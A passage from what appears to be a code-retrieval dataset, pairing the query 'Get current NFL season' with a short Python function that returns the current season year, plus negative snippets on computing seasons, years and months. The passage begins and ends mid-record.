1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None" ]
[ "0.761824", "0.7428767", "0.73708177", "0.73257506", "0.73257506", "0.7152389", "0.704289", "0.69547087", "0.69087857", "0.6902767", "0.69024384", "0.68879527", "0.6800044", "0.6790292", "0.6718005", "0.66617966", "0.65989155", "0.65562785", "0.6515376", "0.6470473", "0.64568293", "0.64470726", "0.6439593", "0.64299315", "0.63277215", "0.6285788", "0.62825024", "0.6279448", "0.6264597", "0.6260421", "0.62279403", "0.6206977", "0.6180007", "0.61727923", "0.6155819", "0.6149182", "0.6119821", "0.6117668", "0.61036336", "0.6094585", "0.6088271", "0.60842365", "0.6083314", "0.60738677", "0.6071956", "0.60670817", "0.6055906", "0.6052203", "0.60344446", "0.601949", "0.60189426", "0.60183614", "0.6015253", "0.6014312", "0.60137486", "0.6004373", "0.59988827", "0.59972984", "0.59972286", "0.59956217", "0.59930134", "0.5992938", "0.59667665", "0.59656984", "0.5952217", "0.59511447", "0.5943307", "0.593549", "0.5931461", "0.5922597", "0.59166336", "0.59079874", "0.58999026", "0.58964026", "0.5895596", "0.58879846", "0.588118", "0.58661413", "0.5862118", "0.5855401", "0.5854364", "0.58506423", "0.584678", "0.58419615", "0.58290994", "0.58281004", "0.58253485", "0.58208215", "0.580188", "0.5794643", "0.57942456", "0.5791576", "0.57840276", "0.5779877", "0.5770533", "0.5761347", "0.5755985", "0.5748669", "0.5744463", "0.574183" ]
0.7301876
5
Get current NFL season After March, returns year of upcoming season.
def current_season() -> int: now = datetime.now() month, year = now.month, now.year if month < 4: year -= 1 return year
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def return_football_season(date=datetime.datetime.today()):\n date_aux = subtract_months(date, 6)\n beginning_year = str(date_aux.year)\n ending_year = date_aux.year + 1\n ending_year = str(ending_year)[-2:]\n season = ''.join([beginning_year, '-', ending_year])\n return season", "def get_upcoming_season(self):\n result = self._method_call(\"UpcomingSeason\")\n return int(result)", "def get_current_player_season(self):\n return self.get_player_season(\"current\")", "def media_season(self):\n media_status = self._media_status()[0]\n return media_status.season if media_status else None", "def getSeason(date):\n\n date = validate.timestamp(date)\n day = date.dayofyear\n leap_year = int(date.is_leap_year)\n\n spring = numpy.arange(80, 172) + leap_year\n summer = numpy.arange(172, 264) + leap_year\n autumn = numpy.arange(264, 355) + leap_year\n\n if day in spring:\n season = \"spring\"\n elif day in summer:\n season = \"summer\"\n elif day in autumn:\n season = \"autumn\"\n else:\n season = \"winter\"\n\n return season", "def calcSeasonModified( monthNum ):\r\n\r\n if monthNum == 12 or monthNum == 1 or monthNum == 2:\r\n return 0\r\n\r\n elif monthNum == 6 or monthNum == 7 or monthNum == 7:\r\n return 1\r\n\r\n else:\r\n return 3", "def seasonNumber(self):\n return self.index", "def seasonNumber(self):\n if self._seasonNumber is None:\n self._seasonNumber = self.parentIndex if isinstance(self.parentIndex, int) else self.season().seasonNumber\n return utils.cast(int, self._seasonNumber)", "def test_get_season_19_march(self, calendar, expected):\n date = datetime.date(2017, 3, 19)\n assert calendar.get_season(date) == expected", "def current_season_phase():\n _update_week_number()\n return _cur_season_phase", "def get_season_year(league_id):\n\n today = date.today()\n\n month = today.month\n year = today.year\n\n if league_id == \"10\":\n season_year = str(year)\n else:\n if month >= 10:\n # Defaulting to current season in October\n next_year = int(str(year)[-2:]) + 1\n season_year = str(year) + \"-\" + str(next_year)\n else:\n # Defaulting to the current or just completed season\n # from Jan. to Sept.\n next_year = int(str(year)[-2:])\n season_year = str(year - 1) + \"-\" + str(next_year)\n\n return season_year", "def get_season(\n current_date: date, hemisphere: str, season_tracking_type: str\n) -> str | None:\n\n if hemisphere == \"equator\":\n return None\n\n if season_tracking_type == TYPE_ASTRONOMICAL:\n spring_start = ephem.next_equinox(str(current_date.year)).datetime()\n summer_start = ephem.next_solstice(str(current_date.year)).datetime()\n autumn_start = ephem.next_equinox(spring_start).datetime()\n winter_start = ephem.next_solstice(summer_start).datetime()\n else:\n spring_start = datetime(2017, 3, 1).replace(year=current_date.year)\n summer_start = spring_start.replace(month=6)\n autumn_start = spring_start.replace(month=9)\n winter_start = spring_start.replace(month=12)\n\n if spring_start <= current_date < summer_start:\n season = STATE_SPRING\n elif summer_start <= current_date < autumn_start:\n season = STATE_SUMMER\n elif autumn_start <= current_date < winter_start:\n season = STATE_AUTUMN\n elif winter_start <= current_date or spring_start > current_date:\n season = STATE_WINTER\n\n # If user is located in the southern hemisphere swap the season\n if hemisphere == NORTHERN:\n return season\n return HEMISPHERE_SEASON_SWAP.get(season)", "def convert_season(row): \n if row[\"month\"] >= 8:\n return int(row[\"season\"][:4])\n else:\n return int(row[\"season\"][-4:])", "def get_current_hockey_year_start():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_last_year()\n\n else: # if month >= 9 (Sept)\n return get_current_year()", "def season(self, seasonnum, order='aired'):\n if order=='aired':\n seasons = self.seasons\n elif order == 'dvd':\n seasons = self.dvd_seasons\n try:\n return seasons[seasonnum]\n except KeyError:\n raise SeasonNotFoundError(\n 'Season no %s does not exists' % seasonnum\n ), None, sys.exc_info()[2]", "def get_current_hockey_year():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8: \n return get_last_year() + get_current_year()\n\n\n else: # if month >= 9 (Sept)\n return get_current_year() + get_next_year()", "def getseason(data):\n ## Season key is the most reliable\n season = data.get(\"season\")\n if season:\n ## Season key is an integer formatted \"YYS\" and is 2000-based (i.e.- 171 == 2017-Winter)\n season = str(season)\n year = int(f\"20{season[:2]}\")\n ## Anichart Season key is 1-indexed\n season = int(season[2]) - 1\n ## This should normally pass; if it consistently does not, we'll have to investigate why\n try: return SeasonCharts.buildseason(season,year)\n ## If something goes wrong, we'll try another method\n except: print(f\"Failed to parse season: {data['season']}\")\n ## Next, we'll iterate over rankings to try to determine the season/year\n ## There are multiple types of rankings based on season, year, and both combined,\n ## so we'll piece it together based on whatever we come across first\n season,year = None,None\n for ranking in data.get(\"rankings\",list()):\n ## Quicker exit (without just making this loop its own function)\n if season and year: continue\n ## We'll ignore stuff we've already gotten and assume that nothing in\n ## rankings contradicts eachother\n if not season:\n ## Defaults to None one way or another if it's not supplied\n season = ranking.get(\"season\")\n if not year: year = ranking.get(\"year\")\n ## Check if we made it\n if season and year:\n ## As above, this should always work out-of-the-box\n try: return SeasonCharts.buildseason(season,year)\n except: print(season,year)\n ## Welp, we're stumped...\n return None", "def get_season_dates(date, season):\n start_date_start = date\n start_date_end = date\n if season == \"Spring\":\n start_date_start = date.replace(month=4)\n start_date_end = date.replace(month=6, day=30)\n elif season == \"Summer\":\n start_date_start = date.replace(month=7)\n start_date_end = date.replace(month=9, day=30)\n elif season == \"Fall\":\n start_date_start = date.replace(month=10)\n start_date_end = date.replace(month=12, day=31)\n elif season == \"Winter\":\n start_date_start = date.replace(month=1)\n start_date_end = date.replace(month=3, day=31)\n return start_date_start, start_date_end", "def get_fiscal_year(self):\n next_calendar_year_months = [10, 11, 12]\n if self.start_date.month in next_calendar_year_months:\n fiscal_year = self.start_date.year + 1\n return fiscal_year\n else:\n return self.start_date.year", "def test_21st_century(self):\r\n season = \"2019-20\"\r\n res = get_end_year(season)\r\n assert res == 2020", "def get_mothers_day_date(year):\r\n start_date = parse(f\"Jan {year}\").date()\r\n for date in rrule(YEARLY, dtstart=start_date, bymonth=5, byweekday=SU, bysetpos=2):\r\n if date.year == year:\r\n return date.date()", "def get_season_no(token, url):\n headers = {'Accept': 'application/json', 'Authorization': token}\n r = requests.get(url, headers=headers)\n json_data = json.loads(r.text).get('data')\n high_season = 1\n for episode in json_data:\n if episode.get('airedSeason') > high_season:\n high_season = episode.get('airedSeason')\n return high_season", "def distributeSeason(self):\n i = 1\n for day in self.daylist:\n if i >= monthbeg[5] and i < monthbeg[9]: #june through SEpt as per SCE\n day.season = 'summer' #https://www.sce.com/residential/rates/Time-Of-Use-Residential-Rate-Plans\n i = i + 1\n else:\n day.season = 'winter'\n i = i+1", "def dia_revolucion(year):\n return nth_day_of_month(3, MON, NOV, year)", "def calcSeason(ra, time):\n # Reference RA and equinox to anchor ra/season reference - RA = 0 is overhead at autumnal equinox\n # autumn equinox 2014 happened on september 23 --> equinox MJD\n Equinox = 2456923.5 - 2400000.5\n # convert ra into 'days'\n dayRA = ra / 360 * 365.25\n firstSeasonBegan = Equinox + dayRA - 0.5 * 365.25\n seasons = (time - firstSeasonBegan) / 365.25\n # Set first season to 0\n seasons = seasons - np.floor(np.min(seasons))\n return seasons", "def test_20th_century(self):\r\n season = \"1989-90\"\r\n res = get_end_year(season)\r\n assert res == 1990", "def calendar_year(cls, tee):\n return iround(((tee - OldHindu.EPOCH) / cls.SIDEREAL_YEAR) - (cls.solar_longitude(tee) / 360))", "def calendar_year(cls, tee):\n return iround(((tee - OldHindu.EPOCH) / cls.MEAN_SIDEREAL_YEAR) - (sidereal_solar_longitude(tee) / 360))", "def get_current_fiscal_year(self):\n current_date = datetime.today().date()\n for year in self.fiscal_years.all():\n if year.begin_date < current_date < year.end_date:\n return year\n return None", "def get_next_hockey_year(year=None):\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_current_year() + get_next_year()\n\n else: # if month >= 9 (Sept)\n next_year = get_next_year()\n return next_year + get_next_year(year=next_year)", "def election_day(year):\n return nth_day_of_month(1, TUE, NOV, year)", "def test_year_2000(self):\r\n season = \"1999-00\"\r\n res = get_end_year(season)\r\n assert res == 2000", "def get_season_url(\n base_url: str, year: Optional[int] = None, season: Optional[str] = None\n) -> str:\n if year is None or season is None:\n return f\"{base_url}/season\"\n return f\"{base_url}/season/{year}/{season.lower()}\"", "def next(self):\n season = self.value\n season = (season + 1) % len(Season.__members__.items())\n return Season(season)", "def getCurrentYear(self):\n return math.ceil(self.wcount / 48)", "def getNumSeasons(self):\n searchURL = \"http://api.tvmaze.com/shows/\" + str(self.__showID) \\\n + \"/seasons\"\n\n response = requests.get(searchURL)\n data = response.json()\n\n return data[-1][\"number\"]", "def get_year(self) -> Optional[int]:\n return self.year", "def get_competition_season_type(season):\n default_type = games.models.CompetitionSeason.winter\n try:\n season_name = season.name\n if season_name.find(\"/\") == -1:\n return games.models.CompetitionSeason.summer\n return default_type\n except Exception as e:\n return default_type", "def set_season(self, season):\n self.set_date_range(dt.date(season, 1, 1),\n dt.date(season, 12, 31))", "def get_fiscal_year_start_month(self):\n return self.fiscal_year_start_month", "def get_months_to_date():\n month_sequence = [5, 4, 3, 2, 1, 12, 11, 10, 9, 8] # season is August to May\n try:\n current_month_index = month_sequence.index(dt.now().month)\n except ValueError:\n current_month_index = 0\n\n return month_sequence[current_month_index:]", "def year(self) -> int:\n if self.is_old_style:\n yy = int(self.split('/', 1)[1][0:2])\n else:\n yy = int(self[:2])\n if yy > 90:\n return 1900 + yy\n return 2000 + yy", "def year(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"year\")", "async def get_season(self, server: model.Server):\n api_url = ('https://eu.api.blizzard.com/sc2/'\n f'ladder/season/{server.id()}')\n payload = {'locale': 'en_US',\n 'access_token': await self.get_access_token()}\n data, status = await self._perform_api_request(api_url, params=payload)\n if status != 200:\n raise InvalidApiResponse(f'{status}: {api_url}')\n\n return model.Season(\n season_id=data.get('seasonId'),\n number=data.get('number'),\n year=data.get('year'),\n server=server,\n start=datetime.fromtimestamp(int(data.get('startDate'))),\n end=datetime.fromtimestamp(int(data.get('endDate')))\n )", "def Seasons(year):\n mar_equinox = _FindSeasonChange(0, year, 3, 19)\n jun_solstice = _FindSeasonChange(90, year, 6, 19)\n sep_equinox = _FindSeasonChange(180, year, 9, 21)\n dec_solstice = _FindSeasonChange(270, year, 12, 20)\n return SeasonInfo(mar_equinox, jun_solstice, sep_equinox, dec_solstice)", "def season_days(season, leap=False):\n\n # Index of first day of each month\n ndays = days_per_month(leap=leap)\n ndays.insert(0,1)\n days = np.cumsum(ndays)\n\n # Index of months for this season\n imon = season_months(season)\n\n # Days of the year for this season\n if isinstance(imon, list):\n # Iterate over months in this season\n idays=[]\n for m in imon:\n idays.extend(list(range(days[m-1], days[m])))\n else:\n # Single month\n idays = list(range(days[imon-1], days[imon]))\n\n return idays", "def set_season_time(season): \n if season == '2021-22':\n startdate = time.strptime('13-08-2021', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('08-10-2021', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n if season == '2020-21':\n startdate = time.strptime('12-08-2020', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('26-07-2021', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n if season == '2019-20':\n startdate = time.strptime('09-08-2019', '%d-%m-%Y')\n startdate = datetime.fromtimestamp(mktime(startdate))\n enddate = time.strptime('26-07-2020', '%d-%m-%Y')\n enddate = datetime.fromtimestamp(mktime(enddate))\n return startdate, enddate", "def seasonEpisode(self):\n return f's{str(self.seasonNumber).zfill(2)}e{str(self.episodeNumber).zfill(2)}'", "def get_pvp_season(self, region, namespace, season_id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/pvp-season/{0}', region, *[season_id], **filters)", "def get_today_year(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[0]", "def season(obs, season_gap=80., mjdCol='observationStartMJD'):\n\n # check wether season has already been estimated\n if 'season' in obs.dtype.names:\n return obs\n\n obs.sort(order=mjdCol)\n\n \"\"\"\n if len(obs) == 1:\n obs = np.atleast_1d(obs)\n obs = rf.append_fields([obs], 'season', [1.])\n return obs\n diff = obs[mjdCol][1:]-obs[mjdCol][:-1]\n\n flag = np.argwhere(diff > season_gap)\n if len(flag) > 0:\n seas = np.zeros((len(obs),), dtype=int)\n flag += 1\n seas[0:flag[0][0]] = 1\n for iflag in range(len(flag)-1):\n seas[flag[iflag][0]:flag[iflag+1][0]] = iflag+2\n seas[flag[-1][0]:] = len(flag)+1\n obs = rf.append_fields(obs, 'season', seas)\n else:\n obs = rf.append_fields(obs, 'season', [1]*len(obs))\n \"\"\"\n seasoncalc = np.ones(obs.size, dtype=int)\n\n if len(obs) > 1:\n diff = np.diff(obs[mjdCol])\n flag = np.where(diff > season_gap)[0]\n\n if len(flag) > 0:\n for i, indx in enumerate(flag):\n seasoncalc[indx+1:] = i+2\n\n obs = rf.append_fields(obs, 'season', seasoncalc)\n return obs", "def twenty_seventeen():\n return 2017", "def set_season(date_obj):\n date_year = date_obj.year\n\n for key, val in SEASONS.items():\n start = datetime(year=date_year, month=val['start']['month'], day=val['start']['day'])\n end = datetime(year=date_year, month=val['end']['month'], day=val['end']['day'])\n if key == 'Winter':\n start_year = date_year - 1 if date_obj.month in [1, 2, 3] else date_year\n end_year = date_year + 1 if date_obj.month == 12 else date_year\n start = datetime(year=start_year, month=val['start']['month'], day=val['start']['day'])\n end = datetime(year=end_year, month=val['end']['month'], day=val['end']['day'])\n\n if start <= date_obj <= end:\n return key", "def get_year(self):\n\n # First we get the first 8 bits stored in the yqr register\n year_bcd = self.__read_register(_REGISTER_YEAR)\n\n # Then we extract the digits and the tens\n tens = (year_bcd & 0xF0) >> 4 # 0xF0 = 0b11110000\n digit = (year_bcd & 0x0F) # 0x0F = 0b00001111\n\n # We return year value shifted in range [1970..2129]\n return (10 * (tens) + digit) + 1970", "def get_year(self):\n return self.year", "def get_last_year(data_id):\n if data_id.startswith(\"cfsv2\"):\n return 2017\n return 2018", "def get_current_year() -> int:\n return datetime.now().year", "def seasons(self):\n if self._season_cache_ver == self._db._version:\n return self._season_cache\n\n # Find out how many seasons in this series by fetching the highest season.\n seasons = self._db.query(type='episode', parent=self._dbrow, attrs=['season'], distinct=True)\n self._season_cache = [Season(self._db, self, row['season']) for row in seasons]\n self._season_cache_ver = self._db._version\n return self._season_cache", "def parse_season(filename):\n print_info('Attempting to parse {0}'.format(filename))\n print_info('Extracting season from {0}'.format(filename))\n for regex in SEASON_REGEX:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_season = m.group('Season').lower()\n print_info('Extracted season: {0}'.format(extracted_season))\n\n season_num = int(extracted_season)\n if season_num is not None and season_num > 0:\n print_info('Season might be: {0}'.format(season_num))\n return 'S' + format_num(season_num)\n return 'S01'", "def get_year(self) -> str:\n return str(self.movie.releasedate.year)", "def season_folder(cls, season):\r\n\r\n\t\t'''# Google Drive downloads replace these characters automatically\r\n\t\t# I'm implementing this in the code as well for convenience\r\n\t\tseason = season.replace(\"&\", \"_\")\r\n\t\tseason = season.replace(\"'\", \"_\")'''\r\n\r\n\t\t# Folder names are ANSI versions of the season name\r\n\t\t# This is important in names like \"Lé Unicorn\" which get\r\n\t\t# converted incorrectly as folder names\r\n\t\tseason = season.encode(encoding=\"utf-8\")\r\n\t\tseason = season.decode(encoding=\"cp1252\", errors=\"ignore\")\r\n\r\n\t\treturn season", "def yy(self):\n return str(self._year)[-2:]", "def day_of_year(self):\n if self._day_of_year is None:\n cumul_days_in_month_nonleap = tf.math.cumsum(\n _DAYS_IN_MONTHS_NON_LEAP, exclusive=True)\n cumul_days_in_month_leap = tf.math.cumsum(\n _DAYS_IN_MONTHS_LEAP, exclusive=True)\n days_before_month_non_leap = tf.gather(cumul_days_in_month_nonleap,\n self.month() - 1)\n days_before_month_leap = tf.gather(cumul_days_in_month_leap,\n self.month() - 1)\n days_before_month = tf.where(\n date_utils.is_leap_year(self.year()), days_before_month_leap,\n days_before_month_non_leap)\n self._day_of_year = days_before_month + self.day()\n return self._day_of_year", "def getYear(self):\n return _libsbml.Date_getYear(self)", "def get_default():\n today = datetime.date.today()\n if today.month == 1:\n return YearMonth(today.year - 1, 12)\n return YearMonth(today.year, today.month - 1)", "def get_year_end(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(month=12, day=31)", "def model_start_year(self):\n return self._model_start_year", "def year(self):\n\n properties_file = open(self.scenario_path + \"/conf/sandag_abm.properties\", \"r\")\n year = None\n\n for line in properties_file:\n # strip all white space from the line\n line = line.replace(\" \", \"\")\n\n # find line containing \"scenarioYear=\"\n m = re.compile(\"scenarioYear=\").match(line)\n if m:\n # take the portion of the line after the matching string\n # and return as the scenario year\n year = int(line[m.end():])\n break\n\n properties_file.close()\n\n return year", "def get_last_year(year=None):\n if year:\n return str(int(year)-1)\n else:\n return str(get_current_year(as_string=False) - 1)", "def timeave_seasonal( mv, seasons=seasonsyr ):\n return seasons.climatology(mv)", "def day_of_year(self):\n return int(self.date.strftime('%j'))", "def getIssnYear(artMeta):\n if artMeta == None:\n return\n else:\n issn = getIssn(artMeta)\n if issn == '':\n issn = artMeta['journal']\n if issn == '':\n return ('noJournal', artMeta['year'])\n issnYear = (issn, artMeta['year'])\n return issnYear", "def season_months(season):\n\n ssn=['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug',\n 'sep', 'oct', 'nov', 'dec', 'djf', 'mam', 'jja', 'son',\n 'mayjun', 'julaug', 'marapr', 'jjas', 'ond', 'ann']\n\n imon = [1, 2, 3, 4, 5, 6, 7, 8,\n 9, 10, 11, 12, [1,2,12], [3,4,5], [6,7,8], [9,10,11],\n [5,6], [7,8], [3,4], [6,7,8,9], [10,11,12], list(range(1,13))]\n\n try:\n ifind = ssn.index(season.lower())\n except ValueError:\n raise ValueError('Season not found! Valid seasons: ' + ', '.join(ssn))\n\n months = imon[ifind]\n\n # Make sure the output is a list\n if isinstance(months, int):\n months =[months]\n\n return months", "def month(self) -> int:\n if self.is_old_style:\n return int(self.split('/', 1)[1][2:4])\n return int(self[2:4])", "def yearShown(self):\n return self.currentYear", "def model_end_year(self):\n return self._model_end_year", "def __get_step1_end_year(yaml_content: dict) -> str:\n\n end_year = None\n\n try:\n end_year = yaml_content['step1.end_year']\n except KeyError as exc:\n print(ConfigurationFactory.__get_key_missing_error_message(exc))\n\n return end_year", "def get_year(date):\n return date.strftime('%Y')", "def from_code(self, code):\n return next((season for season in self._seasons if season.season_code == code.lower()), None)", "def extract_season_episode_from_str(s):\n m = check_for_season_episode_code(s)\n\n if not m:\n return 1, 1\n\n return int(m.group(1)), int(m.group(2))", "def test_get_seasonal_statistics___season_to_date(self):\n msg = \"Response status is not 200\"\n response = self.api.get_seasonal_statistics___season_to_date(self.season, self.nhl_season, self.team_id)\n self.assertEqual(response.status_code, 200, msg)", "def get_number_year(text):\n val = get_number(text)\n if val is None or val < 1700 or val > (datetime.date.today().year + 1):\n return None\n return val", "def getWaterYear(date):\n\n year = date.year\n yearstring = \"{}/{}\"\n if date.month >= 10:\n return yearstring.format(year, year + 1)\n else:\n return yearstring.format(year - 1, year)", "def season(self, title=None, season=None):\n key = f'{self.key}/children?excludeAllLeaves=1'\n if title is not None and not isinstance(title, int):\n return self.fetchItem(key, Season, title__iexact=title)\n elif season is not None or isinstance(title, int):\n if isinstance(title, int):\n index = title\n else:\n index = season\n return self.fetchItem(key, Season, index=index)\n raise BadRequest('Missing argument: title or season is required')", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == 